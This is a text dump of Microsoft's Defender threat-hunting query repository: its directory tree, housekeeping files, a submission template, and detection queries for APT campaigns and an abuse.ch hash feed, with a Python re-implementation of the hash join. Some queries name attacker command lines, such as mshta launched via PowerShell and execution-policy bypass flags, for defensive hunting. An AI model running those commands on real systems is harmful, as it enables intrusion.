Repository: microsoft/WindowsDefenderATP-Hunting-Queries Branch: master Commit: efa17a600b43 Files: 386 Total size: 5.9 MB Directory structure: gitextract_10u3qxy0/ ├── .gitignore ├── 00-query-submission-template.md ├── CODE_OF_CONDUCT.md ├── Campaigns/ │ ├── APT Baby Shark.txt │ ├── APT29 thinktanks.txt │ ├── Abuse.ch Recent Threat Feed.md │ ├── Abusing settingcontent-ms.txt │ ├── Bazacall/ │ │ ├── Bazacall Emails.md │ │ ├── Cobalt Strike Lateral Movement.md │ │ ├── Dropping payload via certutil.md │ │ ├── Excel Macro Execution.md │ │ ├── Excel file download domain pattern.md │ │ ├── Malicious Excel Delivery.md │ │ ├── NTDS theft.md │ │ ├── Renamed Rclone Exfil.md │ │ └── RunDLL Suspicious Network Connection.md │ ├── Bazarloader/ │ │ ├── Stolen Images Execution.md │ │ ├── Zip-Doc - Creation of JPG Payload File.md │ │ └── Zip-Doc - Word Launching MSHTA.md │ ├── Bear Activity GTR 2019.txt │ ├── Cloud Hopper.txt │ ├── DofoilNameCoinServerTraffic.txt │ ├── Dopplepaymer In-Memory Malware Implant.txt │ ├── Dragon Fly.txt │ ├── Elise backdoor.txt │ ├── Equation Group C2 Communication.txt │ ├── Hurricane Panda activity.txt │ ├── Judgement Panda exfil activity.txt │ ├── Jupyter-Solarmaker/ │ │ ├── deimos-component-execution.md │ │ ├── evasive-powershell-executions.md │ │ ├── evasive-powershell-strings.md │ │ └── successive-tk-domain-calls.md │ ├── LemonDuck/ │ │ ├── LemonDuck-competition-killer.md │ │ ├── LemonDuck-component-download-structure.md │ │ ├── LemonDuck-component-names.md │ │ ├── LemonDuck-control-structure.md │ │ ├── LemonDuck-defender-exclusions.md │ │ ├── LemonDuck-email-subjects.md │ │ ├── LemonDuck-id-generation.md │ │ └── LemonDuck-registration-function.md │ ├── Log4J/ │ │ ├── Alerts related to Log4j vulnerability.md │ │ ├── Devices with Log4j vulnerability alerts and additional other alert related context.md │ │ ├── Suspicious JScript staging comment.md │ │ ├── Suspicious PowerShell curl flags.md │ │ └── Suspicious process event creation from VMWare 
Horizon TomcatService.md │ ├── MacOceanLotusBackdoor.txt │ ├── MacOceanLotusDropper.txt │ ├── Macaw Ransomware/ │ │ ├── Disable Controlled Folders.md │ │ ├── Imminent Ransomware.md │ │ ├── Inhibit recovery by disabling tools and functionality.md │ │ ├── Mass account password change.md │ │ ├── PSExec Attrib commands.md │ │ └── Use of MSBuild as LOLBin.md │ ├── OceanLotus registry activity.txt │ ├── Qakbot/ │ │ ├── Excel launching anomalous processes.md │ │ ├── General attempts to access local email store.md │ │ ├── Qakbot Craigslist Domains.md │ │ ├── Qakbot email theft.md │ │ └── Qakbot reconnaissance activities.md │ ├── Ransomware hits healthcare - Alternate Data Streams use.txt │ ├── Ransomware hits healthcare - Backup deletion.txt │ ├── Ransomware hits healthcare - Cipher.exe tool deleting data.txt │ ├── Ransomware hits healthcare - Clearing of system logs.txt │ ├── Ransomware hits healthcare - Possible compromised accounts.txt │ ├── Ransomware hits healthcare - Robbinhood activity.txt │ ├── Ransomware hits healthcare - Turning off System Restore.txt │ ├── Ransomware hits healthcare - Vulnerable Gigabyte drivers.txt │ ├── StrRAT malware/ │ │ ├── StrRAT-AV-Discovery.md │ │ ├── StrRAT-Email-Delivery.md │ │ └── StrRAT-Malware-Persistence.md │ ├── Sysrv-botnet/ │ │ ├── app-armor-stopped.md │ │ ├── java-executing-cmd-to-run-powershell.md │ │ ├── kinsing-miner-download.md │ │ ├── oracle-webLogic-executing-powershell.md │ │ ├── rce-on-vulnerable-server.md │ │ └── tomcat-8-executing-powershell.md │ ├── Threat actor Phosphorus masquerading as conference organizers.md │ ├── WastedLocker Downloader.md │ ├── ZLoader/ │ │ ├── Malicious bat file.md │ │ ├── Payload Delivery.md │ │ └── Suspicious Registry Keys.md │ ├── apt sofacy zebrocy.txt │ ├── apt sofacy.txt │ ├── apt ta17 293a ps.txt │ ├── apt tropictrooper.txt │ ├── apt unidentified nov 18.txt │ ├── c2-lookup-from-nonbrowser[Nobelium].md │ ├── c2-lookup-response[Nobelium].md │ ├── cobalt-strike-invoked-w-wmi.md │ ├── 
compromised-certificate[Nobelium].md │ ├── confluence-weblogic-targeted.md │ ├── cypherpunk-exclusive-commands.md │ ├── cypherpunk-remote-exec-w-psexesvc.md │ ├── detect-cyzfc-activity.md │ ├── fireeye-red-team-tools-CVEs [Nobelium].md │ ├── fireeye-red-team-tools-HASHs [Nobelium].md │ ├── known-affected-software-orion[Nobelium].md │ ├── launching-base64-powershell[Nobelium].md │ ├── launching-cmd-echo[Nobelium].md │ ├── locate-dll-created-locally[Nobelium].md │ ├── locate-dll-loaded-in-memory[Nobelium].md │ ├── oceanlotus-apt32-files.md │ ├── oceanlotus-apt32-network.md │ ├── possible-affected-software-orion[Nobelium].md │ ├── robbinhood-driver.md │ ├── robbinhood-evasion.md │ ├── snip3-aviation-targeting-emails.md │ ├── snip3-detectsanboxie-function-call.md │ ├── snip3-encoded-powershell-structure.md │ ├── snip3-malicious-network-connectivity.md │ └── snip3-revengerat-c2-exfiltration.md ├── Collection/ │ ├── Anomaly of MailItemAccess by Other Users Mailbox [Nobelium].md │ ├── HostExportingMailboxAndRemovingExport[Solarigate].md │ └── MailItemsAccessedTimeSeries[Solarigate].md ├── Command and Control/ │ ├── C2-NamedPipe.md │ ├── Connection to Rare DNS Hosts.md │ ├── DNSPattern [Nobelium].md │ ├── Device network events w low count FQDN.txt │ ├── EncodedDomainURL [Nobelium].md │ ├── Tor.txt │ ├── c2-bluekeep.md │ ├── check-for-shadowhammer-activity-download-domain.md │ ├── python-use-by-ransomware-macos.md │ ├── recon-with-rundll.md │ └── reverse-shell-ransomware-macos.md ├── Credential Access/ │ ├── Active Directory Sensitive Group Modifications.md │ ├── Private Key Files.txt │ ├── cobalt-strike.md │ ├── doppelpaymer-procdump.md │ ├── identify-accounts-logged-on-to-endpoints-affected-by-cobalt-strike.md │ ├── lazagne.md │ ├── logon-attempts-after-malicious-email.md │ ├── procdump-lsass-credentials.md │ ├── wadhrama-credential-dump.md │ └── wdigest-caching.md ├── Defense evasion/ │ ├── ADFSDomainTrustMods[Nobelium].md │ ├── Discovering potentially tampered devices 
[Nobelium].md │ ├── MailPermissionsAddedToApplication[Nobelium].md │ ├── PotentialMicrosoftDefenderTampering[Solarigate].md │ ├── UpdateStsRefreshToken[Solorigate].md │ ├── alt-data-streams.md │ ├── clear-system-logs.md │ ├── deleting-data-w-cipher-tool.md │ ├── doppelpaymer-stop-services.md │ ├── hiding-java-class-file.md │ ├── locate-files-possibly-signed-by-fraudulent-ecc-certificates.md │ ├── qakbot-campaign-process-injection.md │ └── qakbot-campaign-self-deletion.md ├── Delivery/ │ ├── Doc attachment with link to download.txt │ ├── Dropbox downloads linked from other site.txt │ ├── Email link + download + SmartScreen warning.txt │ ├── Gootkit-malware.md │ ├── Open email link.txt │ ├── Pivot from detections to related downloads.txt │ ├── Qakbot Craigslist Domains.md │ ├── detect-jscript-file-creation.md │ └── powercat-download.md ├── Discovery/ │ ├── Detect-Not-Active-AD-User-Accounts.md │ ├── DetectTorRelayConnectivity.md │ ├── DetectTorrentUse.txt │ ├── Discover hosts doing possible network scans.txt │ ├── Enumeration of users & groups for lateral movement.txt │ ├── MultipleLdaps.md │ ├── MultipleSensitiveLdaps.md │ ├── PasswordSearch.md │ ├── PrevalentInteractiveLogons │ ├── Roasting.md │ ├── SMB shares discovery.txt │ ├── SensitiveLdaps.md │ ├── SuspiciousEnumerationUsingAdfind[Nobelium].md │ ├── URL Detection.txt │ ├── VulnComputers.md │ ├── detect-nbtscan-activity.md │ ├── detect-suspicious-commands-initiated-by-web-server-processes.md │ ├── doppelpaymer.md │ ├── qakbot-campaign-esentutl.md │ └── qakbot-campaign-outlook.md ├── Email Queries/ │ ├── Appspot Phishing Abuse.md │ ├── JNLP-File-Attachment.md │ ├── PhishingEmailUrlRedirector.md │ └── referral-phish-emails.md ├── Execution/ │ ├── Base64 Detector and Decoder.md │ ├── Base64encodePEFile.txt │ ├── Detect Encoded Powershell.md │ ├── Detect PowerShell v2 Downgrade.md │ ├── ExecuteBase64DecodedPayload.txt │ ├── File Copy and Execution.md │ ├── Malware_In_recyclebin.txt │ ├── Masquerading system 
executable.txt │ ├── Possible Ransomware Related Destruction Activity.md │ ├── PowerShell downloads.txt │ ├── PowershellCommand - uncommon commands on machine.txt │ ├── PowershellCommand footprint.txt │ ├── Webserver Executing Suspicious Applications.md │ ├── check-for-shadowhammer-activity-implant.md │ ├── detect-anomalous-process-trees.md │ ├── detect-bluekeep-related-mining.md │ ├── detect-doublepulsar-execution.md │ ├── detect-exploitation-of-cve-2018-8653.md │ ├── detect-malcious-use-of-msiexec.md │ ├── detect-malicious-rar-extraction.md │ ├── detect-office-products-spawning-wmic.md │ ├── detect-suspicious-mshta-usage.md │ ├── detect-web-server-exploit-doublepulsar.md │ ├── exchange-iis-worker-dropping-webshell.md │ ├── jse-launched-by-word.md │ ├── launch-questd-w-osascript.md │ ├── locate-shlayer-payload-decryption-activity.md │ ├── locate-shlayer-payload-decrytion-activity.md │ ├── locate-surfbuyer-downloader-decoding-activity.md │ ├── office-apps-launching-wscipt.md │ ├── powershell-activity-after-email-from-malicious-sender.md │ ├── powershell-version-2.0-execution.md │ ├── python-based-attacks-on-macos.md │ ├── qakbot-campaign-suspicious-javascript.md │ ├── reverse-shell-nishang-base64.md │ ├── reverse-shell-nishang.md │ ├── sql-server-abuse.md │ ├── umworkerprocess-creating-webshell.md │ └── umworkerprocess-unusual-subprocess-activity.md ├── Exfiltration/ │ ├── 7-zip-prep-for-exfiltration.md │ ├── Anomaly of MailItemAccess by GraphAPI [Nobelium].md │ ├── Data copied to other location than C drive.txt │ ├── Files copied to USB drives.md │ ├── MailItemsAccessed Throttling [Nobelium].md │ ├── Map external devices.txt │ ├── OAuth Apps accessing user mail via GraphAPI [Nobelium].md │ ├── OAuth Apps reading mail both via GraphAPI and directly [Nobelium].md │ ├── OAuth Apps reading mail via GraphAPI anomaly [Nobelium].md │ ├── Password Protected Archive Creation.md │ ├── Possible File Copy to USB Drive.md │ ├── detect-archive-exfiltration-to-competitor.md │ 
├── detect-exfiltration-after-termination.md │ ├── detect-steganography-exfiltration.md │ └── exchange-powershell-snapin-loaded.md ├── Exploits/ │ ├── AcroRd-Exploits.txt │ ├── CVE-2021-36934 usage detection.md │ ├── Electron-CVE-2018-1000006.txt │ ├── Flash-CVE-2018-4848.txt │ ├── Linux-DynoRoot-CVE-2018-1111.txt │ ├── MosaicLoader.md │ ├── Print Spooler RCE/ │ │ ├── Spoolsv Spawning Rundll32.md │ │ ├── Suspicious DLLs in spool folder.md │ │ ├── Suspicious Spoolsv Child Process.md │ │ └── Suspicious files in spool folder.md │ ├── SolarWinds -CVE-2021-35211.md │ ├── printnightmare-cve-2021-1675 usage detection.md │ ├── winrar-cve-2018-20250-ace-files.md │ └── winrar-cve-2018-20250-file-creation.md ├── Fun/ │ ├── EmojiHunt.txt │ ├── HiddenMessage.txt │ └── Make FolderPath Vogon Poetry.md ├── General queries/ │ ├── Alert Events from Internal IP Address.txt │ ├── AppLocker Policy Design Assistant.md │ ├── Baseline Comparison.txt │ ├── Crashing Applications.md │ ├── Detect Azure RemoteIP.md │ ├── Device Count by DNS Suffix.md │ ├── Device uptime calculation.md │ ├── Endpoint Agent Health Status Report.md │ ├── Events surrounding alert.txt │ ├── Failed Logon Attempt.txt │ ├── File footprint.txt │ ├── Firewall Policy Design Assistant.md │ ├── MD AV Signature and Platform Version.md │ ├── MITRE - Suspicious Events.txt │ ├── Machine info from IP address.txt │ ├── Network footprint.txt │ ├── Network info of machine.txt │ ├── Phish and Malware received by user vs total amount of email.md │ ├── Services.txt │ ├── System Guard Security Level Baseline.txt │ ├── System Guard Security Level Drop.txt │ ├── insider-threat-detection-queries.md │ └── wifikeys.txt ├── Impact/ │ ├── backup-deletion.md │ ├── ransom-note-creation-macos.md │ ├── turn-off-system-restore.md │ └── wadhrama-data-destruction.md ├── Initial access/ │ ├── Check for Maalware Baazar (abuse.ch) hashes in your mail flow.md │ ├── Non_intended_user_logon.md │ ├── PhishingEmailUrlRedirector.md │ ├── 
SuspiciousUrlClicked.md │ ├── WhenZAPed.md │ ├── detect-bluekeep-exploitation-attempts.md │ ├── detect-mailsniper.md │ ├── files-from-malicious-sender.md │ ├── identify-potential-missed-phishing-email-campaigns.md │ └── jar-attachments.md ├── LICENSE ├── Lateral Movement/ │ ├── Account brute force.txt │ ├── Device Logons from Unknown IPs.txt │ ├── ImpersonatedUserFootprint.md │ ├── Network Logons with Local Accounts.md │ ├── Non-local logons with -500 account.txt │ ├── ServiceAccountsPerformingRemotePS.txt │ ├── detect-suspicious-rdp-connections.md │ ├── doppelpaymer-psexec.md │ └── remote-file-creation-with-psexec.md ├── M365-PowerBi Dashboard/ │ ├── Microsoft Threat Protection - API Dashboard.pbit │ └── readme.txt ├── Network/ │ └── Defender for Endpoint Telemetry.txt ├── Notebooks/ │ ├── M365D APIs ep3.ipynb │ ├── WDATP APIs Demo Notebook.ipynb │ └── mtp_hunting.ipynb ├── Persistence/ │ ├── Accessibility Features.txt │ ├── AddedCredentialFromContryXAndSigninFromCountryY.md │ ├── Create account.txt │ ├── CredentialsAddAfterAdminConsentedToApp[Nobelium].md │ ├── LocalAdminGroupChanges.txt │ ├── NewAppOrServicePrincipalCredential[Nobelium].md │ ├── Possible webshell drop.md │ ├── detect-prifou-pua.md │ ├── localAdminAccountLogon.txt │ ├── qakbot-campaign-registry-edit.md │ ├── scheduled task creation.txt │ └── wadhrama-ransomware.md ├── Privilege escalation/ │ ├── Add uncommon credential type to application [Nobelium].md │ ├── SAM-Name-Changes-CVE-2021-42278.md │ ├── ServicePrincipalAddedToRole [Nobelium].md │ ├── cve-2019-0808-c2.md │ ├── cve-2019-0808-nufsys-file creation.md │ ├── cve-2019-0808-set-scheduled-task.md │ ├── dell-driver-vulnerability-2021.md │ ├── detect-cve-2019-0863-AngryPolarBearBug2-exploit.md │ ├── detect-cve-2019-0973-installerbypass-exploit.md │ ├── detect-cve-2019-1053-sandboxescape-exploit.md │ ├── detect-cve-2019-1069-bearlpe-exploit.md │ ├── detect-cve-2019-1129-byebear-exploit.md │ └── locate-ALPC-local-privilege-elevation-exploit.md ├── 
Protection events/ │ ├── AV Detections with Source.txt │ ├── AV Detections with USB Disk Drive.txt │ ├── Antivirus detections.txt │ ├── ExploitGuardASRStats.txt │ ├── ExploitGuardAsrDescriptions.txt │ ├── ExploitGuardBlockOfficeChildProcess.txt │ ├── ExploitGuardControlledFolderAccess.txt │ ├── ExploitGuardNetworkProtectionEvents.txt │ ├── ExploitGuardStats.txt │ ├── PUA ThreatName per Computer.txt │ ├── README.md │ ├── SmartScreen URL block ignored by user.txt │ ├── SmartScreen app block ignored by user.txt │ ├── Windows filtering events (Firewall).txt │ └── WindowsDefenderAVEvents.txt ├── README.md ├── Ransomware/ │ ├── Backup deletion.md │ ├── Check for multiple signs of ransomware activity.md │ ├── Clearing of forensic evidence from event logs using wevtutil.md │ ├── DarkSide.md │ ├── Deletion of data on multiple drives using cipher exe.md │ ├── Discovery for highly-privileged accounts.md │ ├── Distribution from remote location.md │ ├── Fake Replies.md │ ├── File Backup Deletion Alerts.md │ ├── Gootkit File Delivery.md │ ├── HTA Startup Persistence.md │ ├── IcedId Delivery.md │ ├── IcedId attachments.md │ ├── IcedId email delivery.md │ ├── LaZagne Credential Theft.md │ ├── Potential ransomware activity related to Cobalt Strike.md │ ├── Qakbot discovery activies.md │ ├── Sticky Keys.md │ ├── Stopping multiple processes using taskkill.md │ ├── Stopping processes using net stop.md │ ├── Suspicious Bitlocker Encryption.md │ ├── Suspicious Google Doc Links.md │ ├── Suspicious Image Load related to IcedId.md │ ├── Turning off System Restore.md │ └── Turning off services using sc exe.md ├── SECURITY.md ├── TVM/ │ └── devices_with_vuln_and_users_received_payload.md ├── Troubleshooting/ │ ├── Connectivity Failures by Device.md │ └── Connectivity Failures by Domain.md └── Webcasts/ ├── Airlift 2021 - Lets Invoke.csl ├── Ignite 2020 - Best practices for hunting across domains with Microsoft 365 Defender.txt ├── README.md ├── TrackingTheAdversary/ │ ├── Episode 1 - KQL 
Fundamentals.txt │ ├── Episode 2 - Joins.txt │ ├── Episode 3 - Summarizing, Pivoting, and Joining.txt │ ├── Episode 4 - Lets Hunt.txt │ └── README.md └── l33tSpeak/ ├── MCAS - The Hunt.txt ├── Performance, Json and dynamics operator, external data.txt └── l33tspeak 11 Oct 2021 - externaldata and query partitioning.csl ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ ## Ignore Visual Studio temporary files, build results, and ## files generated by popular Visual Studio add-ons. ## ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore # User-specific files *.suo *.user *.userosscache *.sln.docstates # User-specific files (MonoDevelop/Xamarin Studio) *.userprefs # Build results [Dd]ebug/ [Dd]ebugPublic/ [Rr]elease/ [Rr]eleases/ x64/ x86/ bld/ [Bb]in/ [Oo]bj/ [Ll]og/ # Visual Studio 2015 cache/options directory .vs/ # Uncomment if you have tasks that create the project's static files in wwwroot #wwwroot/ # MSTest test Results [Tt]est[Rr]esult*/ [Bb]uild[Ll]og.* # NUNIT *.VisualState.xml TestResult.xml # Build Results of an ATL Project [Dd]ebugPS/ [Rr]eleasePS/ dlldata.c # .NET Core project.lock.json project.fragment.lock.json artifacts/ **/Properties/launchSettings.json *_i.c *_p.c *_i.h *.ilk *.meta *.obj *.pch *.pdb *.pgc *.pgd *.rsp *.sbr *.tlb *.tli *.tlh *.tmp *.tmp_proj *.log *.vspscc *.vssscc .builds *.pidb *.svclog *.scc # Chutzpah Test files _Chutzpah* # Visual C++ cache files ipch/ *.aps *.ncb *.opendb *.opensdf *.sdf *.cachefile *.VC.db *.VC.VC.opendb # Visual Studio profiler *.psess *.vsp *.vspx *.sap # TFS 2012 Local Workspace $tf/ # Guidance Automation Toolkit *.gpState # ReSharper is a .NET coding add-in _ReSharper*/ *.[Rr]e[Ss]harper *.DotSettings.user # JustCode is a .NET coding add-in .JustCode # TeamCity is a build add-in _TeamCity* # 
DotCover is a Code Coverage Tool *.dotCover # Visual Studio code coverage results *.coverage *.coveragexml # NCrunch _NCrunch_* .*crunch*.local.xml nCrunchTemp_* # MightyMoose *.mm.* AutoTest.Net/ # Web workbench (sass) .sass-cache/ # Installshield output folder [Ee]xpress/ # DocProject is a documentation generator add-in DocProject/buildhelp/ DocProject/Help/*.HxT DocProject/Help/*.HxC DocProject/Help/*.hhc DocProject/Help/*.hhk DocProject/Help/*.hhp DocProject/Help/Html2 DocProject/Help/html # Click-Once directory publish/ # Publish Web Output *.[Pp]ublish.xml *.azurePubxml # TODO: Comment the next line if you want to checkin your web deploy settings # but database connection strings (with potential passwords) will be unencrypted *.pubxml *.publishproj # Microsoft Azure Web App publish settings. Comment the next line if you want to # checkin your Azure Web App publish settings, but sensitive information contained # in these scripts will be unencrypted PublishScripts/ # NuGet Packages *.nupkg # The packages folder can be ignored because of Package Restore **/packages/* # except build/, which is used as an MSBuild target. 
!**/packages/build/ # Uncomment if necessary however generally it will be regenerated when needed #!**/packages/repositories.config # NuGet v3's project.json files produces more ignorable files *.nuget.props *.nuget.targets # Microsoft Azure Build Output csx/ *.build.csdef # Microsoft Azure Emulator ecf/ rcf/ # Windows Store app package directories and files AppPackages/ BundleArtifacts/ Package.StoreAssociation.xml _pkginfo.txt # Visual Studio cache files # files ending in .cache can be ignored *.[Cc]ache # but keep track of directories ending in .cache !*.[Cc]ache/ # Others ClientBin/ ~$* *~ *.dbmdl *.dbproj.schemaview *.jfm *.pfx *.publishsettings orleans.codegen.cs # Since there are multiple workflows, uncomment next line to ignore bower_components # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) #bower_components/ # RIA/Silverlight projects Generated_Code/ # Backup & report files from converting an old project file # to a newer Visual Studio version. Backup files are not needed, # because we have git ;-) _UpgradeReport_Files/ Backup*/ UpgradeLog*.XML UpgradeLog*.htm # SQL Server files *.mdf *.ldf *.ndf # Business Intelligence projects *.rdl.data *.bim.layout *.bim_*.settings # Microsoft Fakes FakesAssemblies/ # GhostDoc plugin setting file *.GhostDoc.xml # Node.js Tools for Visual Studio .ntvs_analysis.dat node_modules/ # Typescript v1 declaration files typings/ # Visual Studio 6 build log *.plg # Visual Studio 6 workspace options file *.opt # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 
*.vbw # Visual Studio LightSwitch build output **/*.HTMLClient/GeneratedArtifacts **/*.DesktopClient/GeneratedArtifacts **/*.DesktopClient/ModelManifest.xml **/*.Server/GeneratedArtifacts **/*.Server/ModelManifest.xml _Pvt_Extensions # Paket dependency manager .paket/paket.exe paket-files/ # FAKE - F# Make .fake/ # JetBrains Rider .idea/ *.sln.iml # CodeRush .cr/ # Python Tools for Visual Studio (PTVS) __pycache__/ *.pyc # Cake - Uncomment if you are using it # tools/** # !tools/packages.config # Telerik's JustMock configuration file *.jmconfig # BizTalk build output *.btp.cs *.btm.cs *.odx.cs *.xsd.cs ================================================ FILE: 00-query-submission-template.md ================================================ # < Insert query name > < Provide query description and usage tips > ## Query ``` < Insert query string here > ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** < your name > **GitHub alias:** < your github alias > **Organization:** < your org > **Contact info:** < email or website > ================================================ FILE: CODE_OF_CONDUCT.md ================================================ # Microsoft Open Source Code of Conduct This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). 
Resources: - [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/) - [Microsoft Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) - Contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with questions or concerns ================================================ FILE: Campaigns/APT Baby Shark.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_babyshark.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine =~ @"reg query ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default""" or ProcessCommandLine startswith "powershell.exe mshta.exe http" or ProcessCommandLine =~ "cmd.exe /c taskkill /im cmd.exe" | top 100 by Timestamp desc ================================================ FILE: Campaigns/APT29 thinktanks.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_apt29_thinktanks.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine has "-noni -ep bypass $" | top 100 by Timestamp desc ================================================ FILE: Campaigns/Abuse.ch Recent Threat Feed.md ================================================ # Abuse.ch Recent Threat Feed This query will hunt for files matching the current abuse.ch recent threat feed based on SHA256. Currently the query is set up to analyze the last day's worth of events, but this is configurable using the MaxAge variable.
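The parse-and-join logic of the two queries below, re-implemented offline in Python as an added example (this is not code from the repository). It parses the MalwareBazaar CSV export the same way the first query's `parse_csv`/`trim`/`iff('n/a', ...)` chain does, builds the plain hash set the lightweight variant uses, and then filters process, file and image-load rows by `SHA256` within `MaxAge`. The feed excerpt, the hash list, the device events and the fixed "now" are all constructed for the example; the hashes are placeholders, not real samples, and the function names are the example's own.

```python
import csv
from datetime import datetime, timedelta, timezone

# Column order of the MalwareBazaar CSV export, as the KQL indexes it
# (report[0] .. report[13]).
FEED_COLUMNS = (
    "FirstSeenUtc", "SHA256", "MD5", "SHA1", "Reporter", "FileName", "FileType",
    "MimeType", "Signer", "ClamAV", "VTPercent", "ImpHash", "SSDeep", "TLSH",
)

SHA_A, SHA_B = "a1" * 32, "d4" * 32   # placeholder SHA256 values, not real samples

# Constructed excerpt in the export's layout: '#' comment lines, then one record
# per line of quoted, comma-separated fields, "n/a" for unknowns, trailing comma.
SAMPLE_FEED = "\n".join([
    "# MalwareBazaar recent export, constructed for this example",
    f'"2021-06-01 10:15:00", "{SHA_A}", "{"b2" * 16}", "{"c3" * 20}", "reporter_one", '
    '"invoice.xlsm", "xlsm", "application/vnd.ms-excel.sheet.macroEnabled.12", '
    '"n/a", "Doc.Dropper.Agent", "41.67", "n/a", "n/a", "n/a",',
    f'"2021-06-01 11:00:00", "{SHA_B}", "{"e5" * 16}", "{"f6" * 20}", "reporter_two", '
    '"update.exe", "exe", "application/x-dosexec", '
    f'"n/a", "n/a", "n/a", "{"07" * 16}", "n/a", "n/a",',
])

# Input of the lightweight variant: the txt export, one SHA256 per line (constructed).
SAMPLE_HASH_LIST = "# constructed sha256 list\n" + SHA_A + "\n" + SHA_B + "\n"


def parse_feed(text):
    """Mirror the first query: skip '#' lines, strip spaces/quotes from every
    column, map 'n/a' to '' (0.0 for VTPercent) and parse the timestamp.
    Returns {sha256 (lowercase): record}."""
    rows = [ln for ln in text.splitlines() if ln and not ln.startswith("#")]
    feed = {}
    for row in csv.reader(rows, skipinitialspace=True):
        cols = [c.strip(' "') for c in row[: len(FEED_COLUMNS)]]   # drops the empty trailing field
        rec = dict(zip(FEED_COLUMNS, cols))
        rec["FirstSeenUtc"] = datetime.strptime(
            rec["FirstSeenUtc"], "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
        for key in FEED_COLUMNS[8:]:              # Signer .. TLSH use "n/a" for unknown
            if rec[key] == "n/a":
                rec[key] = ""
        rec["VTPercent"] = float(rec["VTPercent"]) if rec["VTPercent"] else 0.0
        feed[rec["SHA256"].lower()] = rec
    return feed


def parse_hash_list(text):
    """Mirror the lightweight variant: the set of SHA256 values in the txt export."""
    return {ln.strip().lower() for ln in text.splitlines() if ln and not ln.startswith("#")}


def match_events(events, feed_hashes, now, max_age=timedelta(days=1)):
    """Equivalent of the union of joins: every process/file/image-load event newer
    than MaxAge whose SHA256 is in the feed. feed_hashes may be the dict from
    parse_feed() or the set from parse_hash_list()."""
    cutoff = now - max_age
    return [ev for ev in events
            if ev["Timestamp"] > cutoff and ev["SHA256"].lower() in feed_hashes]


NOW = datetime(2021, 6, 2, 12, 0, tzinfo=timezone.utc)   # fixed "now" so the example is reproducible
SAMPLE_EVENTS = [   # constructed rows from the three tables the query unions
    {"Table": "DeviceFileEvents", "Timestamp": NOW - timedelta(hours=3),
     "DeviceName": "ws01", "FileName": "invoice.xlsm", "SHA256": SHA_A},
    {"Table": "DeviceProcessEvents", "Timestamp": NOW - timedelta(hours=2),
     "DeviceName": "ws01", "FileName": "update.exe", "SHA256": SHA_B.upper()},
    {"Table": "DeviceImageLoadEvents", "Timestamp": NOW - timedelta(days=3),
     "DeviceName": "ws02", "FileName": "update.exe", "SHA256": SHA_B},     # older than MaxAge
    {"Table": "DeviceProcessEvents", "Timestamp": NOW - timedelta(hours=1),
     "DeviceName": "ws03", "FileName": "notepad.exe", "SHA256": "00" * 32},  # not in the feed
]

if __name__ == "__main__":
    feed = parse_feed(SAMPLE_FEED)
    for ev in match_events(SAMPLE_EVENTS, feed, NOW):
        rec = feed[ev["SHA256"].lower()]
        print(ev["Table"], ev["DeviceName"], ev["FileName"], "->", rec["Reporter"], rec["VTPercent"])
```

One difference from the KQL is deliberate: `join` and `in` compare strings case-sensitively in Kusto, so the example lowercases both sides. Device telemetry and the feed both carry lowercase hex in practice, but if you ever pull hashes from another source with uppercase hex, normalize them (or use `in~`) before comparing.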
## Query ``` let MaxAge = ago(1d); let AbuseFeed = materialize ( (externaldata(report:string) [@"https://bazaar.abuse.ch/export/csv/recent/"] with (format = "txt")) | where report !startswith '#' | extend report = parse_csv(report) | extend FirstSeenUtc = tostring(report[0]) | project FirstSeenUtc = todatetime(FirstSeenUtc) ,SHA256 = trim('[ "]+',tostring(report[1])) , MD5 = trim('[ "]+',tostring(report[2])) , SHA1 = trim('[ "]+',tostring(report[3])) , Reporter = trim('[ "]+',tostring(report[4])) , FileName = trim('[ "]+',tostring(report[5])) , FileType = trim('[ "]+',tostring(report[6])) , MimeType = trim('[ "]+',tostring(report[7])) , Signer = iff(report[8] == 'n/a', '', trim('[ "]+',tostring(report[8]))) , ClamAV = iff(report[9] == 'n/a', '', trim('[ "]+',tostring(report[9]))) , VTPercent = iff(report[10] == 'n/a', 0.0, todouble(report[10])) , ImpHash = iff(report[11] == 'n/a', '', trim('[ "]+',tostring(report[11]))) , SSDeep = iff(report[12] == 'n/a', '', trim('[ "]+',tostring(report[12]))) , TLSH = iff(report[13] == 'n/a', '', trim('[ "]+',tostring(report[13]))) ); union ( AbuseFeed | join ( DeviceProcessEvents | where Timestamp > MaxAge ) on SHA256 ), ( AbuseFeed | join ( DeviceFileEvents | where Timestamp > MaxAge ) on SHA256 ), ( AbuseFeed | join ( DeviceImageLoadEvents | where Timestamp > MaxAge ) on SHA256 ) ``` ...or if you don't care about the details from Malware Bazaar you might consider this slightly more lightweight version ``` let MaxAge = ago(1d); let AbuseFeed = toscalar ( (externaldata(report:string) [@"https://bazaar.abuse.ch/export/txt/sha256/recent/"] with (format = "txt")) | where report !startswith '#' | summarize make_set(report) ); union ( DeviceProcessEvents | where Timestamp > MaxAge and SHA256 in (AbuseFeed) ), ( DeviceFileEvents | where Timestamp > MaxAge and SHA256 in (AbuseFeed) ), ( DeviceImageLoadEvents | where Timestamp > MaxAge and SHA256 